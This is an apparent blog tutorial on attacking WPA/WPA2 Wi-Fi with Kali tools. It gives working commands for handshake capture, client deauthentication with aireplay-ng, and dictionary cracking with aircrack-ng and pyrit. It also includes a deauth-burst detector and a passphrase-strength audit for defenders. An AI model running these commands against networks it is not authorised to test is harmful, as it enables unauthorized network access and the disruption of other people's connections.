
Pentest WPA / WPA2 Encryption with Kali


By: Klimdy

April 24, 2017


Hello and welcome to this tutorial!

Please note: All tests were carried out on a MacBook Air with Kali Linux installed and a TP-LINK TL-WN722N Wi-Fi adapter.

Step 1:

The first step of this tutorial is to check that the Wi-Fi adapter's network interface is working. Open a terminal and type the following command:


In our case, we see two interfaces. The lo interface does not interest us; we work with wlan0, which is shown in Mode: Managed.

Step 2:

Once we have verified that the Wi-Fi adapter is working, we need to scan for the available Wi-Fi networks. To scan, enter the following command:

iwlist wlan0 scanning

After the command completes, you will see a list of available Wi-Fi networks; choose the target network from among them.

Important: note the Address / ESSID / Channel of the target network.

Step 3:

Now we need to put the network interface into monitor mode. Type the following command:

airmon-ng start wlan0

The wlan0 interface will now be named wlan0mon.

Step 4:

On the selected Wi-Fi network, we have to capture a handshake. To capture it, enter the command:

airodump-ng wlan0mon --bssid 14:3E:BF:F0:66:0E --channel 6 --write handshake --wps


wlan0mon – interface name

--bssid 14:3E:BF:F0:66:0E – MAC address of the router

--channel 6 – restrict the capture to channel 6

--write handshake – record the captured information into files named handshake

--wps – show whether WPS is enabled

Important: note the BSSID / STATION columns.

Step 5:

Please note: If the text WPA handshake: <MAC address> already appears in the upper right corner, you can skip this step.

A handshake occurs only when a client connects to the access point. You can wait until a new client connects to the network, but we forced the selected client to reconnect.

We need to keep the first terminal open. Open a new terminal and type the following command in it:

aireplay-ng -0 10 -a 14:3E:BF:F0:66:0E -c 28:37:37:EA:E6:08 wlan0mon


-0 – deauthentication mode, which forces the client to reconnect

10 – the number of reconnection attempts

-a 14:3E:BF:F0:66:0E – MAC address of the access point

-c 28:37:37:EA:E6:08 – MAC address of the client

wlan0mon – the interface to use

If successful, we will see the handshake notice in the upper right corner of the first terminal.

Close the second terminal, and in the first terminal stop the capture by pressing Ctrl + C.
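The forced reconnection in this step is visible to anyone watching the channel: a burst of deauthentication frames, all carrying the access point's address and all aimed at one client, arrives within a fraction of a second. The following detector is an added example for the defender's side of Step 5 and is not part of the original tutorial. It runs over constructed frame metadata (timestamp, 802.11 type, subtype, source, destination) that reuses the MAC addresses from the tutorial; the traffic itself is made up, and the window and threshold values are assumptions to tune for your environment.

```python
"""Detect deauthentication bursts in 802.11 management-frame metadata.

Added example (not from the original tutorial). A single deauth or disassoc
frame from an access point is normal (idle timeout, roaming); a burst of them
aimed at one client within a second is the fingerprint of a forced reconnection.
"""
from collections import defaultdict, deque

# 802.11 management frames are type 0; these two subtypes tear a client down.
MGMT = 0
DISASSOC = 10
DEAUTH = 12

# Constructed sample records: (timestamp_s, frame_type, frame_subtype, src_mac, dst_mac).
# MAC addresses are the ones used in the tutorial; the traffic is invented.
SAMPLE_FRAMES = (
    [(0.00, MGMT, 8, "14:3E:BF:F0:66:0E", "ff:ff:ff:ff:ff:ff"),       # beacon
     (0.10, 2, 0, "28:37:37:EA:E6:08", "14:3E:BF:F0:66:0E"),          # client data frame
     (0.50, MGMT, DEAUTH, "14:3E:BF:F0:66:0E", "28:37:37:EA:E6:08")]  # one benign deauth
    # A forced-reconnection burst: 40 deauth frames in 0.4 s, with the AP's
    # address as source, all aimed at the same client.
    + [(5.00 + i * 0.01, MGMT, DEAUTH, "14:3E:BF:F0:66:0E", "28:37:37:EA:E6:08")
       for i in range(40)]
    + [(8.00, MGMT, 8, "14:3E:BF:F0:66:0E", "ff:ff:ff:ff:ff:ff")]      # beacon
)


def detect_deauth_bursts(frames, window_s=1.0, threshold=10):
    """Slide a time window over deauth/disassoc frames per (src, dst) pair and
    report the first moment each pair reaches `threshold` frames inside `window_s`.

    Returns a list of (first_ts, last_ts, src, dst, count). Beacons, data
    frames and other management subtypes are ignored. Window and threshold
    are assumed starting values, not standard figures.
    """
    recent = defaultdict(deque)   # (src, dst) -> timestamps still inside the window
    alerts = []
    alerted = set()               # one alert per pair, not one per frame
    for ts, ftype, subtype, src, dst in sorted(frames):
        if ftype != MGMT or subtype not in (DEAUTH, DISASSOC):
            continue
        key = (src, dst)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window_s:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((q[0], ts, src, dst, len(q)))
    return alerts


def summarize(alerts):
    """Human-readable alert lines for a console or log forwarder."""
    return [f"DEAUTH BURST: {count} frames in {last - first:.2f}s from {src} to {dst}"
            for first, last, src, dst, count in alerts]


if __name__ == "__main__":
    for line in summarize(detect_deauth_bursts(SAMPLE_FRAMES)):
        print(line)
```

The lone deauth at 0.50 s does not trigger anything; only the burst does, because the signal is the rate, not the frame type. Detection is possible at all because WPA2 deauthentication frames are unauthenticated unless the network enables Protected Management Frames (802.11w), in which case the client simply discards forged ones and this step of the tutorial fails.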

Step 6:

Now we need to verify the captured handshake. Enter the following command in the terminal:

cowpatty -r handshake-01.cap -c


-r – the capture file that you want to test

handshake-01.cap – the file containing the recorded network traffic

-c – check that the handshake is complete rather than attempt to crack it

This confirms that we have all of the data needed to crack the handshake.

Step 7:

There are two methods of cracking: using the CPU or the GPU. If you have a powerful graphics card, the GPU is faster. In either case, we need a dictionary of candidate passwords.

To crack using the CPU, enter the following command:

aircrack-ng handshake-01.cap -w rockyou.txt


handshake-01.cap – file with handshake

-w rockyou.txt – dictionary with passwords

If the password is in the dictionary, then after a while you will see a message containing the password.


To crack using the GPU, enter the following command:

pyrit -r handshake-01.cap -i rockyou.txt attack_passthrough

If the password is in the dictionary, then after a while you will see a message containing the password.
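Both tools in this step do the same arithmetic: WPA2-Personal derives the Pairwise Master Key as PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), so a dictionary attack on the captured handshake simply recomputes that derivation for every candidate until one matches. The audit below is an added example from the network owner's side and is not part of the original tutorial: it rejects a passphrase that falls to a wordlist (a short constructed list stands in for rockyou.txt) and estimates how long a random passphrase of a given length would resist the attack. The minimum length and the guess rate are assumptions to replace with your own policy and your own benchmark.

```python
"""Audit a WPA2-PSK passphrase against the dictionary attack shown in Step 7.

Added example (not from the original tutorial). The PBKDF2 parameters are the
ones fixed by IEEE 802.11i; MIN_LENGTH and the guess rate are local assumptions.
"""
import hashlib
import string

PBKDF2_ITERATIONS = 4096   # fixed by 802.11i for WPA/WPA2-Personal
PMK_LEN = 32               # 256-bit Pairwise Master Key
MIN_LENGTH = 16            # local policy threshold (assumption, not a standard value)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32).

    The SSID is the salt, so a precomputed table only transfers between
    networks that share an SSID; the 4096 iterations set the cost per guess.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


# Constructed mini-wordlist standing in for rockyou.txt.
WORDLIST = ["password", "12345678", "qwerty123", "letmein1", "iloveyou", "sunshine"]


def wordlist_hit(passphrase: str, ssid: str, wordlist=WORDLIST):
    """Return the wordlist entry whose PMK equals the candidate's PMK, else None.

    Comparing PMKs rather than strings mirrors the cost structure of the attack:
    every candidate costs one full PBKDF2 derivation, nothing less.
    """
    target = derive_pmk(passphrase, ssid)
    for word in wordlist:
        if derive_pmk(word, ssid) == target:
            return word
    return None


# Space is its own one-symbol class so a passphrase with spaces still gets an alphabet.
CHARACTER_CLASSES = (string.ascii_lowercase, string.ascii_uppercase,
                     string.digits, string.punctuation, " ")


def alphabet_size(passphrase: str) -> int:
    """Size of the union of character classes present in the passphrase.

    Treating the passphrase as uniform over this alphabet is an upper bound on
    its strength; passphrases chosen by people are far weaker than this.
    """
    return sum(len(cls) for cls in CHARACTER_CLASSES if any(ch in cls for ch in passphrase))


def expected_crack_seconds(alphabet: int, length: int, guesses_per_second: float) -> float:
    """Expected time to hit a uniformly random passphrase: half the keyspace
    divided by the attacker's PBKDF2 rate."""
    return (alphabet ** length) / 2 / guesses_per_second


def audit_passphrase(passphrase: str, ssid: str, guesses_per_second: float = 1e6,
                     wordlist=WORDLIST) -> dict:
    """Policy gate: reject passphrases found in the wordlist or shorter than
    MIN_LENGTH, and report a brute-force estimate for the assumed guess rate
    (1e6 PBKDF2 derivations per second is a placeholder, not a measurement)."""
    alphabet = alphabet_size(passphrase)
    seconds = expected_crack_seconds(alphabet, len(passphrase), guesses_per_second)
    hit = wordlist_hit(passphrase, ssid, wordlist)
    return {
        "wordlist_hit": hit,
        "length_ok": len(passphrase) >= MIN_LENGTH,
        "alphabet_size": alphabet,
        "brute_force_years": seconds / (365.25 * 24 * 3600),
        "accepted": hit is None and len(passphrase) >= MIN_LENGTH,
    }


if __name__ == "__main__":
    for candidate in ("letmein1", "Correct-Horse-Battery-7"):
        print(candidate, audit_passphrase(candidate, "HomeNet"))
```

The two controls this reduces to are the only ones WPA2-Personal offers against an offline attack on a captured handshake: a passphrase that is not in any wordlist, and enough random length that the 4096-iteration PBKDF2 cost per guess adds up to years rather than hours. Changing the SSID to something uncommon defeats precomputed tables but not a live dictionary run. WPA3-Personal (SAE) removes the offline attack entirely, because the captured exchange no longer lets an attacker test guesses without the access point.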

I hope this tutorial is useful to you.
